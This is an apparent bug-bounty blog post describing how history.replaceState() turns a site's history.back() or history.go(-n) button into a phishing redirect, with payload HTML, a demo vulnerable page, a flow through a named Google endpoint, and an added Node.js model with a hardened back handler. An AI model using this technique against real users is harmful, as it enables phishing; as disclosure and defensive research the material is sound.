Phishing with history.back() open redirect

hyde
Sep 9, 2017 · 2 min read

While participating in a private bug bounty program I ran into a WAF error page that contained details about the request as well as a hyperlink that would send the user back one page. After playing around with some JavaScript, I found that any back button driven by history.back() or history.go(-n) can be abused as an open redirect: the attacker's page calls history.replaceState() to rewrite the URL of its own history entry before sending the victim on to the target, so when the target's back button fires, the browser loads the rewritten URL, a page the victim never actually visited. This assumes the payload page is the history entry the victim is sent back to. Note that replaceState() only accepts a same-origin URL, so the rewritten entry has to stay on the attacker's origin; the value of the trick is that the redirect is triggered by a link on the target site.

Payload (index.html):

<html>
<head>
<title>Continue</title>
</head>
<body>
<!-- onclick runs first and rewrites this entry's URL; the href then navigates -->
<a onclick="exploit()" href="example_of_vuln.html">Continue...</a>
<script>
function exploit(){
  // Rewrite the current history entry so that "back" from the next page
  // loads index.htm instead of index.html (the URL must be same-origin).
  history.replaceState({page: 1}, "Exploit", "index.htm");
}
</script>
</body>
</html>

Example of a vulnerable page (example_of_vuln.html):

<!-- Stands in for a site's back button: it returns to the previous history
     entry, which the payload has already rewritten -->
<script>alert('Going Back!'); history.back();</script>

After Exploitation (index.htm):

<html>
<head>
<title>Exploited</title>
</head>
<body>
<h1>Your browser history was manipulated to send you to a page you never even visited!</h1>
</body>
</html>

I didn't think this would be very applicable to a real-life threat scenario until I discovered that google.com has a page, located at the URL below, that lets the caller choose how many entries to go back in the browser history: it calls history.go(-n), where n is the integer supplied in the backstep GET parameter.

https://accounts.google.com/_/back?backstep=1

In a lab environment I was able to use this bug as a phishing vector. I found that I could lead a target from my payload straight to a Google Sites blog, which contained the following URL as a hyperlink:

https://accounts.google.com/_/back?backstep=2

Clicking it sends the browser back two entries, past the Google Sites blog and onto the payload's rewritten history entry, which is the 'Malicious Page'.

To better show the flow:

Payload (history entry rewritten with replaceState) -> Google Sites Blog -> Click on the URL: https://accounts.google.com/_/back?backstep=2 -> Demo Phishing Page
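To make the mechanism behind both demos concrete, here is an added example (not the post's code) that models a browser's session history in Node.js, since the browser's `history` object does not exist outside a page. It shows why `replaceState()` changes where `history.back()` and `history.go(-n)` land, why the rewritten entry cannot leave the attacker's origin, and what a safer "back" handler looks like. The origins, the Google Sites path and the `safeReturnUrl` helper are assumptions for the model, not anything from the post or from Google.

```javascript
// Added example (not the blog post's code): a small Node.js model of the
// browser's session history, enough to show why history.replaceState()
// turns a history.back()/history.go(-n) button into a redirect, and what a
// safer "back" handler looks like. Node has no `history` object, so the
// semantics are modelled here; origins and paths below are assumptions.

class SessionHistory {
  constructor(startUrl) {
    this.entries = [new URL(startUrl)]; // joint session history
    this.index = 0;                      // current entry
  }

  get current() {
    return this.entries[this.index];
  }

  // A normal navigation drops any forward entries and appends the new one.
  navigate(url) {
    const next = new URL(url, this.current.href);
    this.entries = this.entries.slice(0, this.index + 1);
    this.entries.push(next);
    this.index = this.entries.length - 1;
    return next.href;
  }

  // history.replaceState(state, title, url): rewrites the URL of the *current*
  // entry without navigating. Browsers reject cross-origin URLs with a
  // SecurityError, so the rewritten entry stays on the attacker's origin.
  replaceState(url) {
    const target = new URL(url, this.current.href);
    if (target.origin !== this.current.origin) {
      throw new Error("SecurityError: replaceState URL must be same-origin");
    }
    this.entries[this.index] = target;
    return target.href;
  }

  // history.go(delta): an out-of-range delta is a no-op; otherwise the
  // browser traverses to that entry and loads whatever URL it now holds.
  go(delta) {
    const target = this.index + delta;
    if (target < 0 || target >= this.entries.length) return this.current.href;
    this.index = target;
    return this.current.href;
  }

  back() {
    return this.go(-1);
  }
}

// Replays the post's first demo: the payload rewrites its entry to index.htm,
// links to the vulnerable page, and that page's back button lands on index.htm.
function replayBasicDemo() {
  const h = new SessionHistory("https://attacker.example/index.html");
  h.replaceState("index.htm");                               // onclick="exploit()"
  h.navigate("https://target.example/example_of_vuln.html"); // the href
  return h.back();                                           // history.back()
}

// Replays the Google flow: payload -> Google Sites blog -> /_/back?backstep=2.
// The Sites path is an assumption; the accounts.google.com URL is from the post.
function replayBackstepFlow() {
  const h = new SessionHistory("https://attacker.example/index.html");
  h.replaceState("/phish.html");
  h.navigate("https://sites.google.com/view/some-blog");
  h.navigate("https://accounts.google.com/_/back?backstep=2");
  // The endpoint does history.go(-n) with n taken straight from the query string.
  const n = Number(h.current.searchParams.get("backstep"));
  return h.go(-n);
}

// Hardened "back" handler (assumed design, not Google's fix): ignore the
// history stack and any caller-supplied step count; return to the referrer
// only when it is an https page on an allowlisted origin, else to a fixed page.
function safeReturnUrl(referrer, allowedOrigins, fallback) {
  try {
    const ref = new URL(referrer);
    if (ref.protocol === "https:" && allowedOrigins.includes(ref.origin)) {
      return ref.href;
    }
  } catch (e) {
    // missing or malformed Referer header: fall through to the fallback
  }
  return fallback;
}

console.log("basic demo lands on:", replayBasicDemo());
console.log("backstep flow lands on:", replayBackstepFlow());
```

Run it with `node` and both replays land on attacker-origin URLs that were never loaded in the modelled session, while `replaceState` to another origin throws. The point of `safeReturnUrl` is that a site should decide where "back" goes from data it controls (an allowlist, or a server-side stored return URL) rather than from the browser's history stack or a query-string step count.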

I submitted a report to Google about this through their bug bounty program without much luck, however it was still fun to research and develop a potential attack scenario.

[Screenshot: Initial Payload]

[Screenshot: Vulnerable Page]

[Screenshot: Exploit Successful. Note that the first image shows /index.html, and the browser is sent back to a page that was never visited, index.htm.]
